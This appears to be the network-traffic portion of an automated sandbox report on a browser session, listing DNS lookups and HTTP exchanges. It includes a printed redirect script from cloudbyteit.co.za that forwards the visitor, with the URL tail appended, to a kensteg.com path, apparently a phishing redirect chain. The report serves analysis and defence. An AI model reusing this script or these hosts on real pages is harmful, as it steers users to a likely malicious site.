                                                                    May 24, 2024 05:02:26.161690950 CEST4434974140.127.169.103192.168.2.16
                                                                    May 24, 2024 05:02:26.161815882 CEST49741443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:02:26.161822081 CEST4434974140.127.169.103192.168.2.16
                                                                    May 24, 2024 05:02:26.161880016 CEST4434974140.127.169.103192.168.2.16
                                                                    May 24, 2024 05:02:26.161941051 CEST49741443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:02:26.161993027 CEST49741443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:02:26.161994934 CEST4434974140.127.169.103192.168.2.16
                                                                    May 24, 2024 05:02:26.162018061 CEST49741443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:02:26.162036896 CEST4434974140.127.169.103192.168.2.16
                                                                    May 24, 2024 05:02:26.162055969 CEST4434974140.127.169.103192.168.2.16
                                                                    May 24, 2024 05:02:26.162080050 CEST49741443192.168.2.1640.127.169.103
                                                                    May 24, 2024 05:02:26.162091017 CEST4434974140.127.169.103192.168.2.16
                                                                    May 24, 2024 05:03:16.104974985 CEST4969880192.168.2.16192.229.221.95
                                                                    May 24, 2024 05:03:16.110662937 CEST8049698192.229.221.95192.168.2.16
                                                                    May 24, 2024 05:03:16.110788107 CEST4969880192.168.2.16192.229.221.95
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    May 24, 2024 05:01:52.860955954 CEST5151153192.168.2.161.1.1.1
                                                                    May 24, 2024 05:01:52.861171007 CEST6553353192.168.2.161.1.1.1
                                                                    May 24, 2024 05:01:52.888633966 CEST53519191.1.1.1192.168.2.16
                                                                    May 24, 2024 05:01:52.918304920 CEST53575661.1.1.1192.168.2.16
                                                                    May 24, 2024 05:01:53.992216110 CEST53512781.1.1.1192.168.2.16
                                                                    May 24, 2024 05:01:54.316129923 CEST4947553192.168.2.161.1.1.1
                                                                    May 24, 2024 05:01:54.316438913 CEST6000153192.168.2.161.1.1.1
                                                                    May 24, 2024 05:01:54.910657883 CEST53494751.1.1.1192.168.2.16
                                                                    May 24, 2024 05:01:54.941040993 CEST53600011.1.1.1192.168.2.16
                                                                    May 24, 2024 05:01:57.361300945 CEST5193053192.168.2.161.1.1.1
                                                                    May 24, 2024 05:01:57.361422062 CEST5143453192.168.2.161.1.1.1
                                                                    May 24, 2024 05:01:57.368336916 CEST53519301.1.1.1192.168.2.16
                                                                    May 24, 2024 05:01:57.375066042 CEST53514341.1.1.1192.168.2.16
                                                                    May 24, 2024 05:01:58.174758911 CEST5467753192.168.2.161.1.1.1
                                                                    May 24, 2024 05:01:58.174887896 CEST6248453192.168.2.161.1.1.1
                                                                    May 24, 2024 05:01:58.243474960 CEST53624841.1.1.1192.168.2.16
                                                                    May 24, 2024 05:01:58.243522882 CEST53546771.1.1.1192.168.2.16
                                                                    May 24, 2024 05:01:59.289974928 CEST5821553192.168.2.161.1.1.1
                                                                    May 24, 2024 05:01:59.290278912 CEST6146253192.168.2.161.1.1.1
                                                                    May 24, 2024 05:01:59.290690899 CEST5101953192.168.2.161.1.1.1
                                                                    May 24, 2024 05:01:59.290802956 CEST4994253192.168.2.161.1.1.1
                                                                    May 24, 2024 05:01:59.369259119 CEST53510191.1.1.1192.168.2.16
                                                                    May 24, 2024 05:01:59.369294882 CEST53614621.1.1.1192.168.2.16
                                                                    May 24, 2024 05:01:59.369323969 CEST53499421.1.1.1192.168.2.16
                                                                    May 24, 2024 05:01:59.369350910 CEST53582151.1.1.1192.168.2.16
                                                                    May 24, 2024 05:02:00.781908989 CEST5042553192.168.2.161.1.1.1
                                                                    May 24, 2024 05:02:00.782253027 CEST5894853192.168.2.161.1.1.1
                                                                    May 24, 2024 05:02:00.824218988 CEST53589481.1.1.1192.168.2.16
                                                                    May 24, 2024 05:02:00.824255943 CEST53504251.1.1.1192.168.2.16
                                                                    May 24, 2024 05:02:02.470937967 CEST5190853192.168.2.161.1.1.1
                                                                    May 24, 2024 05:02:02.471405029 CEST5351353192.168.2.161.1.1.1
                                                                    May 24, 2024 05:02:02.524950027 CEST53519081.1.1.1192.168.2.16
                                                                    May 24, 2024 05:02:02.524987936 CEST53535131.1.1.1192.168.2.16
                                                                    May 24, 2024 05:02:03.028198004 CEST5348153192.168.2.161.1.1.1
                                                                    May 24, 2024 05:02:03.028342009 CEST6546853192.168.2.161.1.1.1
                                                                    May 24, 2024 05:02:03.086817026 CEST53654681.1.1.1192.168.2.16
                                                                    May 24, 2024 05:02:03.086847067 CEST53534811.1.1.1192.168.2.16
                                                                    May 24, 2024 05:02:10.975267887 CEST53506971.1.1.1192.168.2.16
                                                                    May 24, 2024 05:02:47.298935890 CEST138138192.168.2.16192.168.2.255
                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                    May 24, 2024 05:01:52.918781042 CEST192.168.2.161.1.1.1c28b(Port unreachable)Destination Unreachable
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    May 24, 2024 05:01:52.860955954 CEST192.168.2.161.1.1.10x459cStandard query (0)qslprinting.us22.list-manage.comA (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:52.861171007 CEST192.168.2.161.1.1.10xbd84Standard query (0)qslprinting.us22.list-manage.com65IN (0x0001)false
                                                                    May 24, 2024 05:01:54.316129923 CEST192.168.2.161.1.1.10x6ed7Standard query (0)cloudbyteit.co.zaA (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:54.316438913 CEST192.168.2.161.1.1.10xd636Standard query (0)cloudbyteit.co.za65IN (0x0001)false
                                                                    May 24, 2024 05:01:57.361300945 CEST192.168.2.161.1.1.10xadfStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:57.361422062 CEST192.168.2.161.1.1.10xcde9Standard query (0)www.google.com65IN (0x0001)false
                                                                    May 24, 2024 05:01:58.174758911 CEST192.168.2.161.1.1.10x6ef2Standard query (0)ztyw.kensteg.comA (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:58.174887896 CEST192.168.2.161.1.1.10xc38bStandard query (0)ztyw.kensteg.com65IN (0x0001)false
                                                                    May 24, 2024 05:01:59.289974928 CEST192.168.2.161.1.1.10xf89cStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:59.290278912 CEST192.168.2.161.1.1.10x8cd3Standard query (0)code.jquery.com65IN (0x0001)false
                                                                    May 24, 2024 05:01:59.290690899 CEST192.168.2.161.1.1.10x7b12Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:59.290802956 CEST192.168.2.161.1.1.10x4b7cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    May 24, 2024 05:02:00.781908989 CEST192.168.2.161.1.1.10xdb36Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:02:00.782253027 CEST192.168.2.161.1.1.10x3735Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    May 24, 2024 05:02:02.470937967 CEST192.168.2.161.1.1.10x19b3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:02:02.471405029 CEST192.168.2.161.1.1.10x9d5fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    May 24, 2024 05:02:03.028198004 CEST192.168.2.161.1.1.10xcc7bStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:02:03.028342009 CEST192.168.2.161.1.1.10xafceStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    May 24, 2024 05:01:52.882014036 CEST1.1.1.1192.168.2.160x459cNo error (0)qslprinting.us22.list-manage.comswc.list-manage.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                    May 24, 2024 05:01:52.918390989 CEST1.1.1.1192.168.2.160xbd84No error (0)qslprinting.us22.list-manage.comswc.list-manage.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                    May 24, 2024 05:01:54.910657883 CEST1.1.1.1192.168.2.160x6ed7No error (0)cloudbyteit.co.za41.185.8.68A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:57.368336916 CEST1.1.1.1192.168.2.160xadfNo error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:57.375066042 CEST1.1.1.1192.168.2.160xcde9No error (0)www.google.com65IN (0x0001)false
                                                                    May 24, 2024 05:01:58.243474960 CEST1.1.1.1192.168.2.160xc38bNo error (0)ztyw.kensteg.com65IN (0x0001)false
                                                                    May 24, 2024 05:01:58.243522882 CEST1.1.1.1192.168.2.160x6ef2No error (0)ztyw.kensteg.com172.67.153.178A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:58.243522882 CEST1.1.1.1192.168.2.160x6ef2No error (0)ztyw.kensteg.com104.21.88.225A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:59.369259119 CEST1.1.1.1192.168.2.160x7b12No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:59.369259119 CEST1.1.1.1192.168.2.160x7b12No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:59.369323969 CEST1.1.1.1192.168.2.160x4b7cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    May 24, 2024 05:01:59.369350910 CEST1.1.1.1192.168.2.160xf89cNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:59.369350910 CEST1.1.1.1192.168.2.160xf89cNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:59.369350910 CEST1.1.1.1192.168.2.160xf89cNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:01:59.369350910 CEST1.1.1.1192.168.2.160xf89cNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:02:00.824218988 CEST1.1.1.1192.168.2.160x3735No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    May 24, 2024 05:02:00.824255943 CEST1.1.1.1192.168.2.160xdb36No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:02:00.824255943 CEST1.1.1.1192.168.2.160xdb36No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:02:02.524950027 CEST1.1.1.1192.168.2.160x19b3No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:02:02.524950027 CEST1.1.1.1192.168.2.160x19b3No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                    May 24, 2024 05:02:02.524987936 CEST1.1.1.1192.168.2.160x9d5fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    May 24, 2024 05:02:03.086847067 CEST1.1.1.1192.168.2.160xcc7bNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                    • slscr.update.microsoft.com
                                                                    • fs.microsoft.com
                                                                    • cloudbyteit.co.za
                                                                    • https:
                                                                      • ztyw.kensteg.com
                                                                      • code.jquery.com
                                                                      • challenges.cloudflare.com
                                                                    • a.nel.cloudflare.com
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.164970340.127.169.103443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:01:48 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OaGPxhBvLP17mF5&MD=VFhxtCam HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                    Host: slscr.update.microsoft.com
                                                                    2024-05-24 03:01:48 UTC560INHTTP/1.1 200 OK
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    Content-Type: application/octet-stream
                                                                    Expires: -1
                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                    MS-CorrelationId: 6a8fb589-9c06-4566-ba87-1ee0c3b47ce6
                                                                    MS-RequestId: c1b89691-e21b-4360-b313-3930f6aeb826
                                                                    MS-CV: gD5WVA8JXk6lSRcq.0
                                                                    X-Microsoft-SLSClientCache: 2880
                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                    X-Content-Type-Options: nosniff
                                                                    Date: Fri, 24 May 2024 03:01:48 GMT
                                                                    Connection: close
                                                                    Content-Length: 24490
                                                                    2024-05-24 03:01:48 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                    2024-05-24 03:01:48 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.1649704184.28.90.27443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:01:50 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    Accept-Encoding: identity
                                                                    User-Agent: Microsoft BITS/7.8
                                                                    Host: fs.microsoft.com
                                                                    2024-05-24 03:01:50 UTC467INHTTP/1.1 200 OK
                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                    Content-Type: application/octet-stream
                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                    Server: ECAcc (lpl/EF06)
                                                                    X-CID: 11
                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                    X-Ms-Region: prod-eus-z1
                                                                    Cache-Control: public, max-age=220104
                                                                    Date: Fri, 24 May 2024 03:01:50 GMT
                                                                    Connection: close
                                                                    X-CID: 2


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.1649705184.28.90.27443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:01:51 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    Accept-Encoding: identity
                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                    Range: bytes=0-2147483646
                                                                    User-Agent: Microsoft BITS/7.8
                                                                    Host: fs.microsoft.com
                                                                    2024-05-24 03:01:51 UTC515INHTTP/1.1 200 OK
                                                                    ApiVersion: Distribute 1.1
                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                    Content-Type: application/octet-stream
                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                    Server: ECAcc (lpl/EF06)
                                                                    X-CID: 11
                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                    X-Ms-Region: prod-weu-z1
                                                                    Cache-Control: public, max-age=220039
                                                                    Date: Fri, 24 May 2024 03:01:51 GMT
                                                                    Content-Length: 55
                                                                    Connection: close
                                                                    X-CID: 2
                                                                    2024-05-24 03:01:51 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.164971241.185.8.684432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:01:55 UTC664OUTGET /play HTTP/1.1
                                                                    Host: cloudbyteit.co.za
                                                                    Connection: keep-alive
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-User: ?1
                                                                    Sec-Fetch-Dest: document
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:01:56 UTC215INHTTP/1.1 301 Moved Permanently
                                                                    Date: Fri, 24 May 2024 03:01:56 GMT
                                                                    Server: Apache
                                                                    Location: https://cloudbyteit.co.za/play/
                                                                    Content-Length: 239
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    2024-05-24 03:01:56 UTC239INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 62 79 74 65 69 74 2e 63 6f 2e 7a 61 2f 70 6c 61 79 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://cloudbyteit.co.za/play/">here</a>.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.164971741.185.8.684432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:01:57 UTC665OUTGET /play/ HTTP/1.1
                                                                    Host: cloudbyteit.co.za
                                                                    Connection: keep-alive
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-User: ?1
                                                                    Sec-Fetch-Dest: document
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:01:58 UTC185INHTTP/1.1 200 OK
                                                                    Date: Fri, 24 May 2024 03:01:57 GMT
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/7.4.33
                                                                    Connection: close
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    2024-05-24 03:01:58 UTC238INData Raw: 65 33 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 76 61 72 20 75 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2f 22 29 20 2b 20 31 3b 0a 20 20 20 20 76 61 72 20 64 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 75 62 73 74 72 69 6e 67 28 75 29 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 22 68 74 74 70 73 3a 2f 2f 5a 74 59 77 2e 6b 65 6e 73 74 65 67 2e 63 6f 6d 2f 38 32 6a 50 49 4f 2f 23 44 22 20 2b 20 64 29 3b 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: e3<html> <body></body> <script> var u = window.location.href.lastIndexOf("/") + 1; var d = window.location.href.substring(u); window.location.replace("https://ZtYw.kensteg.com/82jPIO/#D" + d); </script></html> 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.1649720172.67.153.1784432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:01:58 UTC689OUTGET /82jPIO/ HTTP/1.1
                                                                    Host: ztyw.kensteg.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-Dest: document
                                                                    Referer: https://cloudbyteit.co.za/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:01:59 UTC999INHTTP/1.1 200 OK
                                                                    Date: Fri, 24 May 2024 03:01:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Cache-Control: no-cache, private
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKmtVW5QCjsU5CyncmSoUkppm4UkUE35X2a4nUwV57hNMaNRsOm1ZsopnHrAQeAXlvD1sFsb1hHQmjlzvs1vXL3IZ9sHGhnx2aNd2fSyiZXQaIUb731vsNNp9419Gg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6IndYK0tuT3hZQzVTYk5CRFZWNDl3dmc9PSIsInZhbHVlIjoiaHcyTGRvVmpoQ0FtVUhDelVXaGUxWUZCbDFlc1NabXZxTi9ueHBuT3lTOVd6ekZWbUR3c2doQ0NHMFN4WkxjMnNZVUJCVjd4N21XdW1DbDR1LzlJR2Qvdm01TThzVGlyMHErZVAzSGFPQkJkbE8zT08yL0VWdktGNzlab2dsMm8iLCJtYWMiOiJhYzEyNjhiNjNhYTk4NDg1NGEyNGY4NmYyZWEwN2E5NjYzOGM0MWViYWFiYTAzYjRkMzI4ZDcwY2Y2NjViYWExIiwidGFnIjoiIn0%3D; expires=Fri, 24-May-2024 05:01:59 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                    2024-05-24 03:01:59 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 35 5a 62 57 35 4e 61 45 39 68 62 33 67 79 53 30 52 45 54 55 55 72 59 57 68 59 53 56 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 55 6b 52 57 5a 6c 68 4d 56 79 38 33 52 55 46 79 59 55 68 4d 56 6a 51 31 64 47 56 74 53 6e 64 50 5a 33 46 56 56 47 31 31 4d 54 68 58 53 32 52 55 62 31 5a 30 51 30 78 6a 4d 55 6b 7a 56 48 42 50 56 33 5a 35 59 30 52 50 4e 30 74 69 59 6b 30 79 61 6a 5a 53 62 43 38 34 52 6e 70 4b 4e 46 56 4b 5a 44 68 74 62 45 73 76 62 44 67 32 65 6b 4a 58 56 30 31 52 4f 45 70 48 54 48 52 6d 56 53 74 4c 64 6e 70 55 5a 44 46 35 57 6c 4e 57 51 6c 45 30 4e 6c 64 7a 64 33 4e 6b 62 31 55 32 4d 33 42 4d 55 6d 70 78 5a 55 4e 7a 59 32 6f
                                                                    Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ik5ZbW5NaE9hb3gyS0RETUUrYWhYSVE9PSIsInZhbHVlIjoiUkRWZlhMVy83RUFyYUhMVjQ1dGVtSndPZ3FVVG11MThXS2RUb1Z0Q0xjMUkzVHBPV3Z5Y0RPN0tiYk0yajZSbC84RnpKNFVKZDhtbEsvbDg2ekJXV01ROEpHTHRmVStLdnpUZDF5WlNWQlE0Nldzd3Nkb1U2M3BMUmpxZUNzY2o
